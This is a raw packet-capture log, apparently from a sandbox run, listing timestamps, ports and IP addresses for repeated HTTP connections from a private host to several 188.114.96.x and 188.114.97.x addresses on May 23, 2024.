May 23, 2024 20:18:29.129502058 CEST	49212	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:29.176189899 CEST	80	49212	188.114.96.9	192.168.2.22
May 23, 2024 20:18:29.287446976 CEST	49213	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:29.292767048 CEST	80	49213	188.114.96.3	192.168.2.22
May 23, 2024 20:18:29.292850971 CEST	49213	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:29.294238091 CEST	49213	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:29.348107100 CEST	80	49213	188.114.96.3	192.168.2.22
May 23, 2024 20:18:29.348448992 CEST	49213	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:29.354367971 CEST	80	49213	188.114.96.3	192.168.2.22
May 23, 2024 20:18:29.934037924 CEST	80	49213	188.114.96.3	192.168.2.22
May 23, 2024 20:18:29.934144974 CEST	49213	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:29.939555883 CEST	80	49213	188.114.96.3	192.168.2.22
May 23, 2024 20:18:29.939665079 CEST	49213	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:29.991481066 CEST	80	49213	188.114.96.3	192.168.2.22
May 23, 2024 20:18:30.091880083 CEST	49214	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:30.096884966 CEST	80	49214	188.114.96.9	192.168.2.22
May 23, 2024 20:18:30.096961975 CEST	49214	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:30.098367929 CEST	49214	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:30.149241924 CEST	80	49214	188.114.96.9	192.168.2.22
May 23, 2024 20:18:30.149559975 CEST	49214	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:30.158974886 CEST	80	49214	188.114.96.9	192.168.2.22
May 23, 2024 20:18:30.812721968 CEST	80	49214	188.114.96.9	192.168.2.22
May 23, 2024 20:18:30.813029051 CEST	49214	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:30.817847967 CEST	80	49214	188.114.96.9	192.168.2.22
May 23, 2024 20:18:30.818218946 CEST	49214	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:30.863512039 CEST	80	49214	188.114.96.9	192.168.2.22
May 23, 2024 20:18:30.950469971 CEST	49215	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:30.955699921 CEST	80	49215	188.114.97.3	192.168.2.22
May 23, 2024 20:18:30.955755949 CEST	49215	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:30.957361937 CEST	49215	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:31.008302927 CEST	80	49215	188.114.97.3	192.168.2.22
May 23, 2024 20:18:31.008379936 CEST	49215	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:31.013396025 CEST	80	49215	188.114.97.3	192.168.2.22
May 23, 2024 20:18:31.553235054 CEST	80	49215	188.114.97.3	192.168.2.22
May 23, 2024 20:18:31.557898998 CEST	80	49215	188.114.97.3	192.168.2.22
May 23, 2024 20:18:31.557984114 CEST	49215	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:31.561707020 CEST	49215	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:31.616019011 CEST	80	49215	188.114.97.3	192.168.2.22
May 23, 2024 20:18:31.704751015 CEST	49216	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:31.710861921 CEST	80	49216	188.114.97.3	192.168.2.22
May 23, 2024 20:18:31.710928917 CEST	49216	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:31.712532043 CEST	49216	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:31.764050007 CEST	80	49216	188.114.97.3	192.168.2.22
May 23, 2024 20:18:31.764251947 CEST	49216	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:31.769304037 CEST	80	49216	188.114.97.3	192.168.2.22
May 23, 2024 20:18:32.421569109 CEST	80	49216	188.114.97.3	192.168.2.22
May 23, 2024 20:18:32.426429033 CEST	80	49216	188.114.97.3	192.168.2.22
May 23, 2024 20:18:32.428025961 CEST	49216	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:32.432585001 CEST	49216	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:32.482346058 CEST	80	49216	188.114.97.3	192.168.2.22
May 23, 2024 20:18:37.670437098 CEST	49217	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:37.675462008 CEST	80	49217	188.114.96.3	192.168.2.22
May 23, 2024 20:18:37.675513983 CEST	49217	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:37.677256107 CEST	49217	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:37.737257957 CEST	80	49217	188.114.96.3	192.168.2.22
May 23, 2024 20:18:37.737449884 CEST	49217	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:37.749797106 CEST	80	49217	188.114.96.3	192.168.2.22
May 23, 2024 20:18:38.405973911 CEST	80	49217	188.114.96.3	192.168.2.22
May 23, 2024 20:18:38.406135082 CEST	49217	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:38.412060976 CEST	80	49217	188.114.96.3	192.168.2.22
May 23, 2024 20:18:38.412137032 CEST	49217	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:38.462507963 CEST	80	49217	188.114.96.3	192.168.2.22
May 23, 2024 20:18:38.553268909 CEST	49218	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:38.558691025 CEST	80	49218	188.114.97.9	192.168.2.22
May 23, 2024 20:18:38.558867931 CEST	49218	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:38.560339928 CEST	49218	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:38.611499071 CEST	80	49218	188.114.97.9	192.168.2.22
May 23, 2024 20:18:38.611571074 CEST	49218	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:38.616566896 CEST	80	49218	188.114.97.9	192.168.2.22
May 23, 2024 20:18:39.223416090 CEST	80	49218	188.114.97.9	192.168.2.22
May 23, 2024 20:18:39.223552942 CEST	49218	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:39.228080034 CEST	80	49218	188.114.97.9	192.168.2.22
May 23, 2024 20:18:39.228141069 CEST	49218	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:39.279297113 CEST	80	49218	188.114.97.9	192.168.2.22
May 23, 2024 20:18:39.374656916 CEST	49219	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:39.379738092 CEST	80	49219	188.114.97.3	192.168.2.22
May 23, 2024 20:18:39.379828930 CEST	49219	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:39.381191015 CEST	49219	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:39.439763069 CEST	80	49219	188.114.97.3	192.168.2.22
May 23, 2024 20:18:39.439939022 CEST	49219	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:39.444869041 CEST	80	49219	188.114.97.3	192.168.2.22
May 23, 2024 20:18:40.118145943 CEST	80	49219	188.114.97.3	192.168.2.22
May 23, 2024 20:18:40.118309975 CEST	49219	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:40.122809887 CEST	80	49219	188.114.97.3	192.168.2.22
May 23, 2024 20:18:40.122873068 CEST	49219	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:40.175375938 CEST	80	49219	188.114.97.3	192.168.2.22
May 23, 2024 20:18:40.266922951 CEST	49220	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:40.272515059 CEST	80	49220	188.114.97.9	192.168.2.22
May 23, 2024 20:18:40.272617102 CEST	49220	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:40.275028944 CEST	49220	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:40.324906111 CEST	80	49220	188.114.97.9	192.168.2.22
May 23, 2024 20:18:40.324969053 CEST	49220	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:40.335352898 CEST	80	49220	188.114.97.9	192.168.2.22
May 23, 2024 20:18:41.062020063 CEST	80	49220	188.114.97.9	192.168.2.22
May 23, 2024 20:18:41.062396049 CEST	49220	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:41.067291021 CEST	80	49220	188.114.97.9	192.168.2.22
May 23, 2024 20:18:41.067363024 CEST	49220	80	192.168.2.22	188.114.97.9
May 23, 2024 20:18:41.115900040 CEST	80	49220	188.114.97.9	192.168.2.22
May 23, 2024 20:18:41.202528000 CEST	49221	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:41.208758116 CEST	80	49221	188.114.97.3	192.168.2.22
May 23, 2024 20:18:41.208885908 CEST	49221	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:41.210685968 CEST	49221	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:41.263386965 CEST	80	49221	188.114.97.3	192.168.2.22
May 23, 2024 20:18:41.263561964 CEST	49221	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:41.268692017 CEST	80	49221	188.114.97.3	192.168.2.22
May 23, 2024 20:18:41.825371027 CEST	80	49221	188.114.97.3	192.168.2.22
May 23, 2024 20:18:41.825609922 CEST	49221	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:41.830404043 CEST	80	49221	188.114.97.3	192.168.2.22
May 23, 2024 20:18:41.830468893 CEST	49221	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:41.875379086 CEST	80	49221	188.114.97.3	192.168.2.22
May 23, 2024 20:18:41.972013950 CEST	49222	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:41.979032040 CEST	80	49222	188.114.96.9	192.168.2.22
May 23, 2024 20:18:41.979100943 CEST	49222	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:41.981230974 CEST	49222	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:42.035593033 CEST	80	49222	188.114.96.9	192.168.2.22
May 23, 2024 20:18:42.035691977 CEST	49222	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:42.040638924 CEST	80	49222	188.114.96.9	192.168.2.22
May 23, 2024 20:18:42.757237911 CEST	80	49222	188.114.96.9	192.168.2.22
May 23, 2024 20:18:42.757392883 CEST	49222	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:42.762008905 CEST	80	49222	188.114.96.9	192.168.2.22
May 23, 2024 20:18:42.762120008 CEST	49222	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:42.807414055 CEST	80	49222	188.114.96.9	192.168.2.22
May 23, 2024 20:18:42.906660080 CEST	49223	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:42.914242029 CEST	80	49223	188.114.97.3	192.168.2.22
May 23, 2024 20:18:42.915751934 CEST	49223	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:42.915751934 CEST	49223	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:42.967382908 CEST	80	49223	188.114.97.3	192.168.2.22
May 23, 2024 20:18:42.967454910 CEST	49223	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:42.972389936 CEST	80	49223	188.114.97.3	192.168.2.22
May 23, 2024 20:18:43.629870892 CEST	80	49223	188.114.97.3	192.168.2.22
May 23, 2024 20:18:43.630059004 CEST	49223	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:43.635159969 CEST	80	49223	188.114.97.3	192.168.2.22
May 23, 2024 20:18:43.635348082 CEST	49223	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:43.687453032 CEST	80	49223	188.114.97.3	192.168.2.22
May 23, 2024 20:18:43.777362108 CEST	49224	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:43.782859087 CEST	80	49224	188.114.97.3	192.168.2.22
May 23, 2024 20:18:43.782959938 CEST	49224	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:43.784657955 CEST	49224	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:43.836062908 CEST	80	49224	188.114.97.3	192.168.2.22
May 23, 2024 20:18:43.836149931 CEST	49224	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:43.842952013 CEST	80	49224	188.114.97.3	192.168.2.22
May 23, 2024 20:18:44.555512905 CEST	80	49224	188.114.97.3	192.168.2.22
May 23, 2024 20:18:44.555834055 CEST	49224	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:44.560210943 CEST	80	49224	188.114.97.3	192.168.2.22
May 23, 2024 20:18:44.560412884 CEST	49224	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:44.607567072 CEST	80	49224	188.114.97.3	192.168.2.22
May 23, 2024 20:18:44.720216036 CEST	49225	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:44.729110003 CEST	80	49225	188.114.97.3	192.168.2.22
May 23, 2024 20:18:44.729173899 CEST	49225	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:44.730540991 CEST	49225	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:44.785034895 CEST	80	49225	188.114.97.3	192.168.2.22
May 23, 2024 20:18:44.785157919 CEST	49225	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:44.790195942 CEST	80	49225	188.114.97.3	192.168.2.22
May 23, 2024 20:18:45.475836992 CEST	80	49225	188.114.97.3	192.168.2.22
May 23, 2024 20:18:45.475959063 CEST	49225	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:45.480552912 CEST	80	49225	188.114.97.3	192.168.2.22
May 23, 2024 20:18:45.480629921 CEST	49225	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:45.527388096 CEST	80	49225	188.114.97.3	192.168.2.22
May 23, 2024 20:18:45.618139982 CEST	49226	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:45.623120070 CEST	80	49226	188.114.96.3	192.168.2.22
May 23, 2024 20:18:45.623198986 CEST	49226	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:45.625277042 CEST	49226	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:45.675935030 CEST	80	49226	188.114.96.3	192.168.2.22
May 23, 2024 20:18:45.676068068 CEST	49226	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:45.681091070 CEST	80	49226	188.114.96.3	192.168.2.22
May 23, 2024 20:18:46.361529112 CEST	80	49226	188.114.96.3	192.168.2.22
May 23, 2024 20:18:46.361800909 CEST	49226	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:46.366256952 CEST	80	49226	188.114.96.3	192.168.2.22
May 23, 2024 20:18:46.366374016 CEST	49226	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:46.411386013 CEST	80	49226	188.114.96.3	192.168.2.22
May 23, 2024 20:18:46.510885000 CEST	49227	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:46.515919924 CEST	80	49227	188.114.96.9	192.168.2.22
May 23, 2024 20:18:46.515980005 CEST	49227	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:46.517579079 CEST	49227	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:46.568047047 CEST	80	49227	188.114.96.9	192.168.2.22
May 23, 2024 20:18:46.568125963 CEST	49227	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:46.573229074 CEST	80	49227	188.114.96.9	192.168.2.22
May 23, 2024 20:18:47.281491995 CEST	80	49227	188.114.96.9	192.168.2.22
May 23, 2024 20:18:47.281672001 CEST	49227	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:47.286205053 CEST	80	49227	188.114.96.9	192.168.2.22
May 23, 2024 20:18:47.286289930 CEST	49227	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:47.334537029 CEST	80	49227	188.114.96.9	192.168.2.22
May 23, 2024 20:18:47.433515072 CEST	49228	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:47.438740015 CEST	80	49228	188.114.96.3	192.168.2.22
May 23, 2024 20:18:47.438805103 CEST	49228	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:47.441037893 CEST	49228	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:47.492156029 CEST	80	49228	188.114.96.3	192.168.2.22
May 23, 2024 20:18:47.492285967 CEST	49228	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:47.497483969 CEST	80	49228	188.114.96.3	192.168.2.22
May 23, 2024 20:18:48.175781965 CEST	80	49228	188.114.96.3	192.168.2.22
May 23, 2024 20:18:48.175956964 CEST	49228	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:48.182308912 CEST	80	49228	188.114.96.3	192.168.2.22
May 23, 2024 20:18:48.182405949 CEST	49228	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:48.187917948 CEST	80	49228	188.114.96.3	192.168.2.22
May 23, 2024 20:18:48.351999998 CEST	49229	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:48.356985092 CEST	80	49229	188.114.96.9	192.168.2.22
May 23, 2024 20:18:48.357043982 CEST	49229	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:48.359256983 CEST	49229	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:48.416409016 CEST	80	49229	188.114.96.9	192.168.2.22
May 23, 2024 20:18:48.416635990 CEST	49229	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:48.421559095 CEST	80	49229	188.114.96.9	192.168.2.22
May 23, 2024 20:18:48.995060921 CEST	80	49229	188.114.96.9	192.168.2.22
May 23, 2024 20:18:48.995213985 CEST	49229	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:48.999769926 CEST	80	49229	188.114.96.9	192.168.2.22
May 23, 2024 20:18:48.999816895 CEST	49229	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:49.005135059 CEST	80	49229	188.114.96.9	192.168.2.22
May 23, 2024 20:18:49.159334898 CEST	49230	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:49.164683104 CEST	80	49230	188.114.96.3	192.168.2.22
May 23, 2024 20:18:49.164763927 CEST	49230	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:49.167216063 CEST	49230	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:49.223968029 CEST	80	49230	188.114.96.3	192.168.2.22
May 23, 2024 20:18:49.224333048 CEST	49230	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:49.235268116 CEST	80	49230	188.114.96.3	192.168.2.22
May 23, 2024 20:18:49.907802105 CEST	80	49230	188.114.96.3	192.168.2.22
May 23, 2024 20:18:49.908107996 CEST	49230	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:49.912498951 CEST	80	49230	188.114.96.3	192.168.2.22
May 23, 2024 20:18:49.912585974 CEST	49230	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:49.959351063 CEST	80	49230	188.114.96.3	192.168.2.22
May 23, 2024 20:18:50.055159092 CEST	49231	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:50.060125113 CEST	80	49231	188.114.96.3	192.168.2.22
May 23, 2024 20:18:50.060190916 CEST	49231	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:50.061779022 CEST	49231	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:50.115463972 CEST	80	49231	188.114.96.3	192.168.2.22
May 23, 2024 20:18:50.115547895 CEST	49231	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:50.121743917 CEST	80	49231	188.114.96.3	192.168.2.22
May 23, 2024 20:18:50.904115915 CEST	80	49231	188.114.96.3	192.168.2.22
May 23, 2024 20:18:50.904345989 CEST	49231	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:50.908838987 CEST	80	49231	188.114.96.3	192.168.2.22
May 23, 2024 20:18:50.908915997 CEST	80	49231	188.114.96.3	192.168.2.22
May 23, 2024 20:18:50.908932924 CEST	49231	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:50.909041882 CEST	49231	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:50.955348969 CEST	80	49231	188.114.96.3	192.168.2.22
May 23, 2024 20:18:51.078972101 CEST	49232	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:51.084835052 CEST	80	49232	188.114.97.3	192.168.2.22
May 23, 2024 20:18:51.084973097 CEST	49232	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:51.088057041 CEST	49232	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:51.139642000 CEST	80	49232	188.114.97.3	192.168.2.22
May 23, 2024 20:18:51.139714003 CEST	49232	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:51.144674063 CEST	80	49232	188.114.97.3	192.168.2.22
May 23, 2024 20:18:51.811686039 CEST	80	49232	188.114.97.3	192.168.2.22
May 23, 2024 20:18:51.811917067 CEST	49232	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:51.819205999 CEST	80	49232	188.114.97.3	192.168.2.22
May 23, 2024 20:18:51.819262981 CEST	49232	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:51.863404036 CEST	80	49232	188.114.97.3	192.168.2.22
May 23, 2024 20:18:52.411706924 CEST	49233	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:52.416716099 CEST	80	49233	188.114.97.3	192.168.2.22
May 23, 2024 20:18:52.416785955 CEST	49233	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:52.425127983 CEST	49233	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:52.471393108 CEST	80	49233	188.114.97.3	192.168.2.22
May 23, 2024 20:18:52.471481085 CEST	49233	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:52.476424932 CEST	80	49233	188.114.97.3	192.168.2.22
May 23, 2024 20:18:53.175486088 CEST	80	49233	188.114.97.3	192.168.2.22
May 23, 2024 20:18:53.175540924 CEST	80	49233	188.114.97.3	192.168.2.22
May 23, 2024 20:18:53.175569057 CEST	80	49233	188.114.97.3	192.168.2.22
May 23, 2024 20:18:53.175734997 CEST	49233	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:53.175734997 CEST	49233	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:53.175734997 CEST	49233	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:53.228733063 CEST	80	49233	188.114.97.3	192.168.2.22
May 23, 2024 20:18:53.336059093 CEST	49234	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:53.397744894 CEST	80	49234	188.114.96.3	192.168.2.22
May 23, 2024 20:18:53.397900105 CEST	49234	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:53.400223017 CEST	49234	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:53.452393055 CEST	80	49234	188.114.96.3	192.168.2.22
May 23, 2024 20:18:53.452541113 CEST	49234	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:53.457628965 CEST	80	49234	188.114.96.3	192.168.2.22
May 23, 2024 20:18:54.152542114 CEST	80	49234	188.114.96.3	192.168.2.22
May 23, 2024 20:18:54.152836084 CEST	49234	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:54.157191038 CEST	80	49234	188.114.96.3	192.168.2.22
May 23, 2024 20:18:54.157515049 CEST	49234	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:54.203366995 CEST	80	49234	188.114.96.3	192.168.2.22
May 23, 2024 20:18:54.304996967 CEST	49235	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:54.310209990 CEST	80	49235	188.114.97.3	192.168.2.22
May 23, 2024 20:18:54.310343981 CEST	49235	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:54.312724113 CEST	49235	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:54.367979050 CEST	80	49235	188.114.97.3	192.168.2.22
May 23, 2024 20:18:54.368185043 CEST	49235	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:54.373188019 CEST	80	49235	188.114.97.3	192.168.2.22
May 23, 2024 20:18:55.058381081 CEST	80	49235	188.114.97.3	192.168.2.22
May 23, 2024 20:18:55.058501959 CEST	49235	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:55.063146114 CEST	80	49235	188.114.97.3	192.168.2.22
May 23, 2024 20:18:55.063201904 CEST	49235	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:55.068267107 CEST	80	49235	188.114.97.3	192.168.2.22
May 23, 2024 20:18:55.217660904 CEST	49236	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:55.230531931 CEST	80	49236	188.114.96.9	192.168.2.22
May 23, 2024 20:18:55.230593920 CEST	49236	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:55.233505964 CEST	49236	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:55.285490036 CEST	80	49236	188.114.96.9	192.168.2.22
May 23, 2024 20:18:55.285542965 CEST	49236	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:55.290523052 CEST	80	49236	188.114.96.9	192.168.2.22
May 23, 2024 20:18:55.949836969 CEST	80	49236	188.114.96.9	192.168.2.22
May 23, 2024 20:18:55.949934959 CEST	49236	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:55.954416990 CEST	80	49236	188.114.96.9	192.168.2.22
May 23, 2024 20:18:55.954468966 CEST	49236	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:55.959794998 CEST	80	49236	188.114.96.9	192.168.2.22
May 23, 2024 20:18:56.084198952 CEST	49237	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:56.091255903 CEST	80	49237	188.114.97.3	192.168.2.22
May 23, 2024 20:18:56.091937065 CEST	49237	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:56.093322992 CEST	49237	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:56.144155025 CEST	80	49237	188.114.97.3	192.168.2.22
May 23, 2024 20:18:56.147967100 CEST	49237	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:56.153148890 CEST	80	49237	188.114.97.3	192.168.2.22
May 23, 2024 20:18:56.761086941 CEST	80	49237	188.114.97.3	192.168.2.22
May 23, 2024 20:18:56.761234045 CEST	49237	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:56.765678883 CEST	80	49237	188.114.97.3	192.168.2.22
May 23, 2024 20:18:56.765746117 CEST	49237	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:56.770900011 CEST	80	49237	188.114.97.3	192.168.2.22
May 23, 2024 20:18:56.898202896 CEST	49238	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:56.903373957 CEST	80	49238	188.114.97.3	192.168.2.22
May 23, 2024 20:18:56.907948971 CEST	49238	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:56.909323931 CEST	49238	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:56.959897995 CEST	80	49238	188.114.97.3	192.168.2.22
May 23, 2024 20:18:56.960011005 CEST	49238	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:56.965142012 CEST	80	49238	188.114.97.3	192.168.2.22
May 23, 2024 20:18:57.642050982 CEST	80	49238	188.114.97.3	192.168.2.22
May 23, 2024 20:18:57.642155886 CEST	49238	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:57.646832943 CEST	80	49238	188.114.97.3	192.168.2.22
May 23, 2024 20:18:57.646892071 CEST	49238	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:57.651808023 CEST	80	49238	188.114.97.3	192.168.2.22
May 23, 2024 20:18:57.785172939 CEST	49239	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:57.790627003 CEST	80	49239	188.114.97.3	192.168.2.22
May 23, 2024 20:18:57.790719986 CEST	49239	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:57.792134047 CEST	49239	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:57.851222992 CEST	80	49239	188.114.97.3	192.168.2.22
May 23, 2024 20:18:57.851361990 CEST	49239	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:57.870512962 CEST	80	49239	188.114.97.3	192.168.2.22
May 23, 2024 20:18:58.415482044 CEST	80	49239	188.114.97.3	192.168.2.22
May 23, 2024 20:18:58.415669918 CEST	49239	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:58.420624018 CEST	80	49239	188.114.97.3	192.168.2.22
May 23, 2024 20:18:58.420691967 CEST	49239	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:58.425591946 CEST	80	49239	188.114.97.3	192.168.2.22
May 23, 2024 20:18:58.586455107 CEST	49240	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:58.591564894 CEST	80	49240	188.114.96.9	192.168.2.22
May 23, 2024 20:18:58.591670036 CEST	49240	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:58.594043016 CEST	49240	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:58.643439054 CEST	80	49240	188.114.96.9	192.168.2.22
May 23, 2024 20:18:58.643681049 CEST	49240	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:58.648767948 CEST	80	49240	188.114.96.9	192.168.2.22
May 23, 2024 20:18:59.363837957 CEST	80	49240	188.114.96.9	192.168.2.22
May 23, 2024 20:18:59.363984108 CEST	49240	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:59.369342089 CEST	80	49240	188.114.96.9	192.168.2.22
May 23, 2024 20:18:59.369405031 CEST	49240	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:59.415354013 CEST	80	49240	188.114.96.9	192.168.2.22
May 23, 2024 20:18:59.513999939 CEST	49241	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:59.519048929 CEST	80	49241	188.114.97.3	192.168.2.22
May 23, 2024 20:18:59.519161940 CEST	49241	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:59.521470070 CEST	49241	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:59.571609020 CEST	80	49241	188.114.97.3	192.168.2.22
May 23, 2024 20:18:59.571789980 CEST	49241	80	192.168.2.22	188.114.97.3
